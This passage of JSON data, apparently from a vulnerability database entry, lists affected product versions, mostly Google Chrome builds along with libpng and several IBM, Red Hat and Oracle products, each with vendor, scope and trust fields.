"version": "9.0.597.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "45.0.2454.85"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.96"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.572.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1055.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.786.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "36.0.1985.122"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1039.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.836.0"
},
{
"_id": null,
"model": "expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.642.1"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.591.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "45.0.2454.101"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.41"
},
{
"_id": null,
"model": "cognos metrics manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.107"
},
{
"_id": null,
"model": "smartcloud provisioning for software virtual appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.79"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1012.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.74"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.95"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.67"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.580.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.81"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.123"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.146"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1305.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.761.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.45"
},
{
"_id": null,
"model": "enterprise linux supplementary server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.130"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.765.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.100"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.0.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.75"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.53"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.553.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.745.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1061.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.829.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.32"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.8"
},
{
"_id": null,
"model": "security network protection",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1309.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.76"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.677.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.890.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.770.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "47.0.2526.73"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.69"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.83"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.95"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1297.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1068.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.762.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.66"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.723.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.103"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.884.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.621.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1068.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.83"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.36"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.12"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.811.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.12"
},
{
"_id": null,
"model": "tivoli monitoring fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.305"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.106"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.709.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.96"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.882.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.68"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1002.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "26.0.1410.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.111"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.118"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.134"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.721.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.74"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.68"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.750.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.88"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.563.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.771.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.603.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.906.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.114"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.86"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.601.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1306.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.812.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.944.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.635.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.89"
},
{
"_id": null,
"model": "expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1660.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1036.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1012.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1037.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "40.0.2214.115"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.104"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.752.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.834.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.94"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1654.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.112"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.112"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.103"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.216"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.327"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.186"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.956.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1662.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.217"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.108"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.23"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1305.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.622.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.91"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.159"
},
{
"_id": null,
"model": "forms viewer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1062.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.556.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.772.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.119"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.161"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.125"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.4"
},
{
"_id": null,
"model": "cplex enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.5.0.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1059.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.140"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.321"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.870.0"
